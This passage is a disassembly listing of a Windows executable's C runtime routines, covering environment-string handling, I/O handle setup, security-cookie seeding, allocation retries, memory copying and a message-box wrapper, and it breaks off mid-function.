call dword_40D050 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_408F56
mov eax, ebp
mov dword_411D48, eax
jmp short loc_408F5B
; ---------------------------------------------------------------------------
loc_408F56: ; CODE XREF: sub_408F12+39�j
mov eax, dword_411D48
loc_408F5B: ; CODE XREF: sub_408F12+1A�j
; sub_408F12+42�j
cmp eax, 1
jnz loc_408FE8
loc_408F64: ; CODE XREF: sub_408F12+2E�j
cmp esi, ebx
jnz short loc_408F77
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jnz short loc_408F77
loc_408F70: ; CODE XREF: sub_408F12+DC�j
; sub_408F12+E8�j ...
xor eax, eax
jmp loc_409040
; ---------------------------------------------------------------------------
loc_408F77: ; CODE XREF: sub_408F12+54�j
; sub_408F12+5C�j
cmp [esi], bx
mov eax, esi
jz short loc_408F8C
loc_408F7E: ; CODE XREF: sub_408F12+71�j
; sub_408F12+78�j
add eax, ebp
cmp [eax], bx
jnz short loc_408F7E
add eax, ebp
cmp [eax], bx
jnz short loc_408F7E
loc_408F8C: ; CODE XREF: sub_408F12+6A�j
mov edi, dword_40D19C
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_408FDD
push ebp
call sub_409323
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_408FDD
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_408FD9
push [esp+18h+var_8]
call sub_40405A
pop ecx
mov [esp+18h+var_8], ebx
loc_408FD9: ; CODE XREF: sub_408F12+B7�j
mov ebx, [esp+18h+var_8]
loc_408FDD: ; CODE XREF: sub_408F12+97�j
; sub_408F12+A6�j
push esi
call dword_40D198 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_409040
; ---------------------------------------------------------------------------
loc_408FE8: ; CODE XREF: sub_408F12+4C�j
cmp eax, ebp
jz short loc_408FF0
cmp eax, ebx
jnz short loc_408F70
loc_408FF0: ; CODE XREF: sub_408F12+D8�j
call dword_40D194 ; GetEnvironmentStrings
mov esi, eax
cmp esi, ebx
jz loc_408F70
cmp [esi], bl
jz short loc_40900E
loc_409004: ; CODE XREF: sub_408F12+F5�j
; sub_408F12+FA�j
inc eax
cmp [eax], bl
jnz short loc_409004
inc eax
cmp [eax], bl
jnz short loc_409004
loc_40900E: ; CODE XREF: sub_408F12+F0�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_409323
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_40902C
push esi
call dword_40D190 ; FreeEnvironmentStringsA
jmp loc_408F70
; ---------------------------------------------------------------------------
loc_40902C: ; CODE XREF: sub_408F12+10C�j
push ebp
push esi
push edi
call sub_403BE0
add esp, 0Ch
push esi
call dword_40D190 ; FreeEnvironmentStringsA
mov eax, edi
loc_409040: ; CODE XREF: sub_408F12+60�j
; sub_408F12+D4�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_408F12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409047 proc near ; CODE XREF: seg001:00404C97�p
var_64 = byte ptr -64h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 54h
push offset dword_40E6A0
call __SEH_prolog4
xor edi, edi
mov [ebp+ms_exc.disabled], edi
lea eax, [ebp+var_64]
push eax
call dword_40D114 ; GetStartupInfoA
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
push 38h
push 20h
pop esi
push esi
call sub_409363
pop ecx
pop ecx
cmp eax, edi
jz loc_40927E
mov dword_413A80, eax
mov dword_413A68, esi
lea ecx, [eax+700h]
jmp short loc_4090BA
; ---------------------------------------------------------------------------
loc_409091: ; CODE XREF: sub_409047+75�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov [eax+8], edi
mov byte ptr [eax+24h], 0
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 38h
mov ecx, dword_413A80
add ecx, 700h
loc_4090BA: ; CODE XREF: sub_409047+48�j
cmp eax, ecx
jb short loc_409091
cmp [ebp+var_32], di
jz loc_4091C5
mov eax, [ebp+var_30]
cmp eax, edi
jz loc_4091C5
mov edi, [eax]
lea ebx, [eax+4]
lea eax, [ebx+edi]
mov [ebp+var_1C], eax
mov eax, 800h
cmp edi, eax
jl short loc_4090E9
mov edi, eax
loc_4090E9: ; CODE XREF: sub_409047+9E�j
xor esi, esi
inc esi
jmp short loc_409140
; ---------------------------------------------------------------------------
loc_4090EE: ; CODE XREF: sub_409047+FF�j
push 38h
push 20h
call sub_409363
pop ecx
pop ecx
test eax, eax
jz short loc_40914A
lea ecx, ds:413A80h[esi*4]
mov [ecx], eax
add dword_413A68, 20h
lea edx, [eax+700h]
jmp short loc_40913B
; ---------------------------------------------------------------------------
loc_409115: ; CODE XREF: sub_409047+F6�j
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
and byte ptr [eax+24h], 80h
mov byte ptr [eax+25h], 0Ah
mov byte ptr [eax+26h], 0Ah
add eax, 38h
mov edx, [ecx]
add edx, 700h
loc_40913B: ; CODE XREF: sub_409047+CC�j
cmp eax, edx
jb short loc_409115
inc esi
loc_409140: ; CODE XREF: sub_409047+A5�j
cmp dword_413A68, edi
jl short loc_4090EE
jmp short loc_409150
; ---------------------------------------------------------------------------
loc_40914A: ; CODE XREF: sub_409047+B4�j
mov edi, dword_413A68
loc_409150: ; CODE XREF: sub_409047+101�j
and [ebp+var_20], 0
test edi, edi
jle short loc_4091C5
loc_409158: ; CODE XREF: sub_409047+17C�j
mov eax, [ebp+var_1C]
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_4091B8
cmp ecx, 0FFFFFFFEh
jz short loc_4091B8
mov al, [ebx]
test al, 1
jz short loc_4091B8
test al, 8
jnz short loc_40917C
push ecx
call dword_40D1A8 ; GetFileType
test eax, eax
jz short loc_4091B8
loc_40917C: ; CODE XREF: sub_409047+128�j
mov esi, [ebp+var_20]
mov eax, esi
sar eax, 5
and esi, 1Fh
imul esi, 38h
add esi, dword_413A80[eax*4]
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [esi], eax
mov al, [ebx]
mov [esi+4], al
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_407B1C
pop ecx
pop ecx
test eax, eax
jz loc_40927E
inc dword ptr [esi+8]
loc_4091B8: ; CODE XREF: sub_409047+119�j
; sub_409047+11E�j ...
inc [ebp+var_20]
inc ebx
add [ebp+var_1C], 4
cmp [ebp+var_20], edi
jl short loc_409158
loc_4091C5: ; CODE XREF: sub_409047+7B�j
; sub_409047+86�j ...
xor ebx, ebx
loc_4091C7: ; CODE XREF: sub_409047+213�j
mov esi, ebx
imul esi, 38h
add esi, dword_413A80
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_4091E4
cmp eax, 0FFFFFFFEh
jz short loc_4091E4
or byte ptr [esi+4], 80h
jmp short loc_409256
; ---------------------------------------------------------------------------
loc_4091E4: ; CODE XREF: sub_409047+190�j
; sub_409047+195�j
mov byte ptr [esi+4], 81h
test ebx, ebx
jnz short loc_4091F1
push 0FFFFFFF6h
pop eax
jmp short loc_4091FB
; ---------------------------------------------------------------------------
loc_4091F1: ; CODE XREF: sub_409047+1A3�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_4091FB: ; CODE XREF: sub_409047+1A8�j
push eax
call dword_40D14C ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40924C
test edi, edi
jz short loc_40924C
push edi
call dword_40D1A8 ; GetFileType
test eax, eax
jz short loc_40924C
mov [esi], edi
and eax, 0FFh
cmp eax, 2
jnz short loc_40922A
or byte ptr [esi+4], 40h
jmp short loc_409233
; ---------------------------------------------------------------------------
loc_40922A: ; CODE XREF: sub_409047+1DB�j
cmp eax, 3
jnz short loc_409233
or byte ptr [esi+4], 8
loc_409233: ; CODE XREF: sub_409047+1E1�j
; sub_409047+1E6�j
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_407B1C
pop ecx
pop ecx
test eax, eax
jz short loc_40927E
inc dword ptr [esi+8]
jmp short loc_409256
; ---------------------------------------------------------------------------
loc_40924C: ; CODE XREF: sub_409047+1C0�j
; sub_409047+1C4�j ...
or byte ptr [esi+4], 40h
mov dword ptr [esi], 0FFFFFFFEh
loc_409256: ; CODE XREF: sub_409047+19B�j
; sub_409047+203�j
inc ebx
cmp ebx, 3
jl loc_4091C7
push dword_413A68
call dword_40D1A4 ; LockResource
xor eax, eax
jmp short loc_409281
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_40927E: ; CODE XREF: sub_409047+31�j
; sub_409047+168�j ...
or eax, 0FFFFFFFFh
loc_409281: ; CODE XREF: sub_409047+227�j
call __SEH_epilog4
retn
sub_409047 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409287 proc near ; CODE XREF: seg001:loc_404D7B�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_410440
and [ebp+var_8], 0
and [ebp+var_4], 0
push ebx
push edi
mov edi, 0BB40E64Eh
cmp eax, edi
mov ebx, 0FFFF0000h
jz short loc_4092B7
test eax, ebx
jz short loc_4092B7
not eax
mov dword_410444, eax
jmp short loc_409317
; ---------------------------------------------------------------------------
loc_4092B7: ; CODE XREF: sub_409287+21�j
; sub_409287+25�j
push esi
lea eax, [ebp+var_8]
push eax
call dword_40D170 ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call dword_40D0D8 ; GetCurrentProcessId
xor esi, eax
call dword_40D168 ; GetCurrentThreadId
xor esi, eax
call dword_40D1B0 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call dword_40D1AC ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
cmp esi, edi
jnz short loc_4092FD
mov esi, 0BB40E64Fh
jmp short loc_409308
; ---------------------------------------------------------------------------
loc_4092FD: ; CODE XREF: sub_409287+6D�j
test esi, ebx
jnz short loc_409308
mov eax, esi
shl eax, 10h
or esi, eax
loc_409308: ; CODE XREF: sub_409287+74�j
; sub_409287+78�j
mov dword_410440, esi
not esi
mov dword_410444, esi
pop esi
loc_409317: ; CODE XREF: sub_409287+2E�j
pop edi
pop ebx
leave
retn
sub_409287 endp
; =============== S U B R O U T I N E =======================================
sub_40931B proc near ; CODE XREF: sub_404D8F+CE�p
; sub_404E8B+18�p ...
and dword_413A64, 0
retn
sub_40931B endp
; =============== S U B R O U T I N E =======================================
sub_409323 proc near ; CODE XREF: sub_40505E+48�p
; sub_406AC5+5D0�p ...
arg_0 = dword ptr 4
push esi
push edi
xor esi, esi
loc_409327: ; CODE XREF: sub_409323+39�j
push [esp+8+arg_0]
call sub_403B17
mov edi, eax
test edi, edi
pop ecx
jnz short loc_40935E
cmp dword_411D4C, eax
jbe short loc_40935E
push esi
call dword_40D0EC ; Sleep
lea eax, [esi+3E8h]
cmp eax, dword_411D4C
jbe short loc_409357
or eax, 0FFFFFFFFh
loc_409357: ; CODE XREF: sub_409323+2F�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_409327
loc_40935E: ; CODE XREF: sub_409323+12�j
; sub_409323+1A�j
mov eax, edi
pop edi
pop esi
retn
sub_409323 endp
; =============== S U B R O U T I N E =======================================
sub_409363 proc near ; CODE XREF: sub_406471+24�p
; sub_406621+139�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_409367: ; CODE XREF: sub_409363+41�j
push 0
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40B684
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_4093A6
cmp dword_411D4C, eax
jbe short loc_4093A6
push esi
call dword_40D0EC ; Sleep
lea eax, [esi+3E8h]
cmp eax, dword_411D4C
jbe short loc_40939F
or eax, 0FFFFFFFFh
loc_40939F: ; CODE XREF: sub_409363+37�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_409367
loc_4093A6: ; CODE XREF: sub_409363+1A�j
; sub_409363+22�j
mov eax, edi
pop edi
pop esi
retn
sub_409363 endp
; =============== S U B R O U T I N E =======================================
sub_4093AB proc near ; CODE XREF: sub_407459+5C�p
; sub_407459+73�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_4093AF: ; CODE XREF: sub_4093AB+44�j
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40B7A2
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_4093F1
cmp [esp+8+arg_4], eax
jz short loc_4093F1
cmp dword_411D4C, eax
jbe short loc_4093F1
push esi
call dword_40D0EC ; Sleep
lea eax, [esi+3E8h]
cmp eax, dword_411D4C
jbe short loc_4093EA
or eax, 0FFFFFFFFh
loc_4093EA: ; CODE XREF: sub_4093AB+3A�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_4093AF
loc_4093F1: ; CODE XREF: sub_4093AB+17�j
; sub_4093AB+1D�j ...
mov eax, edi
pop edi
pop esi
retn
sub_4093AB endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409400 proc near ; CODE XREF: sub_4051C5+2DA�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_409420
cmp edi, eax
jb loc_4095C4
loc_409420: ; CODE XREF: sub_409400+16�j
cmp ecx, 100h
jb short loc_409447
cmp dword_413B84, 0
jz short loc_409447
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_409447
pop esi
pop edi
pop ebp
jmp sub_405FEE
; ---------------------------------------------------------------------------
loc_409447: ; CODE XREF: sub_409400+26�j
; sub_409400+2F�j ...
test edi, 3
jnz short loc_409464
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_409484
rep movsd
jmp off_409574[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_409464: ; CODE XREF: sub_409400+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_40947C
and eax, 3
add ecx, eax
jmp dword ptr loc_409484+4[eax*4]
; ---------------------------------------------------------------------------
loc_40947C: ; CODE XREF: sub_409400+6E�j
jmp dword ptr loc_409584[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_409484: ; CODE XREF: sub_409400+58�j
; sub_409400+B6�j ...
jmp off_409508[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_409498
dd offset loc_4094C4
dd offset loc_4094E8
; ---------------------------------------------------------------------------
loc_409498: ; DATA XREF: sub_409400+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_409484
rep movsd
jmp off_409574[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4094C4: ; DATA XREF: sub_409400+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_409484
rep movsd
jmp off_409574[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4094E8: ; DATA XREF: sub_409400+94�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_409484
rep movsd
jmp off_409574[edx*4]
; ---------------------------------------------------------------------------
align 4
off_409508 dd offset loc_40956B ; DATA XREF: sub_409400:loc_409484�r
dd offset loc_409558
dd offset loc_409550
dd offset loc_409548
dd offset loc_409540
dd offset loc_409538
dd offset loc_409530
dd offset loc_409528
; ---------------------------------------------------------------------------
loc_409528: ; CODE XREF: sub_409400:loc_409484�j
; DATA XREF: sub_409400+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_409530: ; CODE XREF: sub_409400:loc_409484�j
; DATA XREF: sub_409400+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_409538: ; CODE XREF: sub_409400:loc_409484�j
; DATA XREF: sub_409400+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_409540: ; CODE XREF: sub_409400:loc_409484�j
; DATA XREF: sub_409400+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_409548: ; CODE XREF: sub_409400:loc_409484�j
; DATA XREF: sub_409400+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_409550: ; CODE XREF: sub_409400:loc_409484�j
; DATA XREF: sub_409400+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_409558: ; CODE XREF: sub_409400:loc_409484�j
; DATA XREF: sub_409400+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40956B: ; CODE XREF: sub_409400:loc_409484�j
; DATA XREF: sub_409400:off_409508�o
jmp off_409574[edx*4]
; ---------------------------------------------------------------------------
align 4
off_409574 dd offset loc_409584 ; DATA XREF: sub_409400+5C�r
; sub_409400+BA�r ...
dd offset loc_40958C
dd offset loc_409598
dd offset loc_4095AC
; ---------------------------------------------------------------------------
loc_409584: ; CODE XREF: sub_409400+5C�j
; sub_409400+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40958C: ; CODE XREF: sub_409400+5C�j
; sub_409400+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_409598: ; CODE XREF: sub_409400+5C�j
; sub_409400+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4095AC: ; CODE XREF: sub_409400+5C�j
; sub_409400+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4095C4: ; CODE XREF: sub_409400+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4095F8
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4095EC
std
rep movsd
cld
jmp off_409710[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4095EC: ; CODE XREF: sub_409400+1DD�j
; sub_409400+238�j ...
neg ecx
jmp off_4096C0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4095F8: ; CODE XREF: sub_409400+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_409610
and eax, 3
sub ecx, eax
jmp dword ptr loc_409610+4[eax*4]
; ---------------------------------------------------------------------------
loc_409610: ; CODE XREF: sub_409400+202�j
; DATA XREF: sub_409400+209�r
jmp off_409710[ecx*4]
; ---------------------------------------------------------------------------
align 4
and al, 96h
inc eax
add [eax-6Ah], cl
inc eax
add [eax-6Ah], dh
inc eax
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_4095EC
std
rep movsd
cld
jmp off_409710[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4095EC
std
rep movsd
cld
jmp off_409710[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4095EC
std
rep movsd
cld
jmp off_409710[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4096C4
dd offset loc_4096CC
dd offset loc_4096D4
dd offset loc_4096DC
dd offset loc_4096E4
dd offset loc_4096EC
dd offset loc_4096F4
off_4096C0 dd offset loc_409707 ; DATA XREF: sub_409400+1EE�r
; ---------------------------------------------------------------------------
loc_4096C4: ; DATA XREF: sub_409400+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4096CC: ; DATA XREF: sub_409400+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4096D4: ; DATA XREF: sub_409400+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4096DC: ; DATA XREF: sub_409400+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4096E4: ; DATA XREF: sub_409400+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4096EC: ; DATA XREF: sub_409400+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_4096F4: ; DATA XREF: sub_409400+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_409707: ; CODE XREF: sub_409400+1EE�j
; DATA XREF: sub_409400:off_4096C0�o
jmp off_409710[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_409710 dd offset loc_409720 ; DATA XREF: sub_409400+1E3�r
; sub_409400:loc_409610�r ...
dd offset loc_409728
dd offset loc_409738
dd offset loc_40974C
; ---------------------------------------------------------------------------
loc_409720: ; CODE XREF: sub_409400+1E3�j
; sub_409400:loc_409610�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_409728: ; CODE XREF: sub_409400+1E3�j
; sub_409400:loc_409610�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_409738: ; CODE XREF: sub_409400+1E3�j
; sub_409400:loc_409610�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40974C: ; CODE XREF: sub_409400+1E3�j
; sub_409400:loc_409610�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_409400 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409765 proc near ; CODE XREF: sub_405D62+15D�p
var_30 = dword ptr -30h
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_4062C3
xor ebx, ebx
cmp dword_411D50, ebx
mov [ebp+var_8], eax
mov [ebp+var_4], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz loc_40983B
push offset aUser32_dll ; "USER32.DLL"
call dword_40D174 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40991B
mov esi, dword_40D100
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
jz loc_40991B
push eax
call sub_406255
mov [esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
push edi
mov dword_411D50, eax
call esi ; GetProcAddress
push eax
call sub_406255
mov [esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_411D54, eax
call esi ; GetProcAddress
push eax
call sub_406255
mov dword_411D58, eax
lea eax, [ebp+var_C]
push eax
call sub_4042D8
test eax, eax
pop ecx
pop ecx
jz short loc_409809
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_404D8F
add esp, 14h
loc_409809: ; CODE XREF: sub_409765+95�j
cmp [ebp+var_C], 2
jnz short loc_40983B
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; GetProcAddress
push eax
call sub_406255
cmp eax, ebx
pop ecx
mov dword_411D60, eax
jz short loc_40983B
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; GetProcAddress
push eax
call sub_406255
pop ecx
mov dword_411D5C, eax
loc_40983B: ; CODE XREF: sub_409765+22�j
; sub_409765+A8�j ...
mov eax, dword_411D5C
mov ecx, [ebp+var_8]
cmp eax, ecx
jz short loc_4098C0
cmp dword_411D60, ecx
jz short loc_4098C0
push eax
call sub_4062CC
push dword_411D60
mov esi, eax
call sub_4062CC
cmp esi, ebx
pop ecx
pop ecx
mov edi, eax
jz short loc_4098C0
cmp edi, ebx
jz short loc_4098C0
call esi ; GetProcAddress
cmp eax, ebx
jz short loc_40988D
lea ecx, [ebp+var_14]
push ecx
push 0Ch
lea ecx, [ebp+var_20]
push ecx
push 1
push eax
call edi
test eax, eax
jz short loc_40988D
test [ebp+var_18], 1
jnz short loc_4098C0
loc_40988D: ; CODE XREF: sub_409765+10D�j
; sub_409765+120�j
lea eax, [ebp+var_10]
push eax
call sub_40430F
test eax, eax
pop ecx
jz short loc_4098A8
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_404D8F
add esp, 14h
loc_4098A8: ; CODE XREF: sub_409765+134�j
cmp [ebp+var_10], 4
jb short loc_4098B7
or [ebp+arg_8], 200000h
jmp short loc_4098FB
; ---------------------------------------------------------------------------
loc_4098B7: ; CODE XREF: sub_409765+147�j
or [ebp+arg_8], 40000h
jmp short loc_4098FB
; ---------------------------------------------------------------------------
loc_4098C0: ; CODE XREF: sub_409765+E0�j
; sub_409765+E8�j ...
mov eax, dword_411D54
cmp eax, [ebp+var_8]
jz short loc_4098FB
push eax
call sub_4062CC
cmp eax, ebx
pop ecx
jz short loc_4098FB
call eax
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_4098FB
mov eax, dword_411D58
cmp eax, [ebp+var_8]
jz short loc_4098FB
push eax
call sub_4062CC
cmp eax, ebx
pop ecx
jz short loc_4098FB
push [ebp+var_4]
call eax
mov [ebp+var_4], eax
loc_4098FB: ; CODE XREF: sub_409765+150�j
; sub_409765+159�j ...
push dword_411D50
call sub_4062CC
cmp eax, ebx
pop ecx
jz short loc_40991B
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_4]
call eax
jmp short loc_40991D
; ---------------------------------------------------------------------------
loc_40991B: ; CODE XREF: sub_409765+37�j
; sub_409765+4D�j ...
xor eax, eax
loc_40991D: ; CODE XREF: sub_409765+1B4�j
pop edi
pop esi
pop ebx
leave
retn
sub_409765 endp
; =============== S U B R O U T I N E =======================================
sub_409922 proc near ; CODE XREF: sub_405D62+117�p
; sub_405D62+139�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
xor ebx, ebx
cmp eax, ebx
push esi
push edi
jz short loc_409937
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_409952
loc_409937: ; CODE XREF: sub_409922+B�j
; sub_409922+3A�j
call sub_403F8F
push 16h
pop esi
mov [eax], esi
loc_409941: ; CODE XREF: sub_409922+69�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_404E8B
add esp, 14h
mov eax, esi
jmp short loc_40998F
; ---------------------------------------------------------------------------
loc_409952: ; CODE XREF: sub_409922+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_40995E
loc_40995A: ; CODE XREF: sub_409922+48�j
mov [eax], bl
jmp short loc_409937
; ---------------------------------------------------------------------------
loc_40995E: ; CODE XREF: sub_409922+36�j
mov edx, eax
loc_409960: ; CODE XREF: sub_409922+44�j
cmp [edx], bl
jz short loc_409968
inc edx
dec edi
jnz short loc_409960
loc_409968: ; CODE XREF: sub_409922+40�j
cmp edi, ebx
jz short loc_40995A
loc_40996C: ; CODE XREF: sub_409922+55�j
mov cl, [esi]
mov [edx], cl
inc edx
inc esi
cmp cl, bl
jz short loc_409979
dec edi
jnz short loc_40996C
loc_409979: ; CODE XREF: sub_409922+52�j
cmp edi, ebx
jnz short loc_40998D
mov [eax], bl
call sub_403F8F
push 22h
pop ecx
mov [eax], ecx
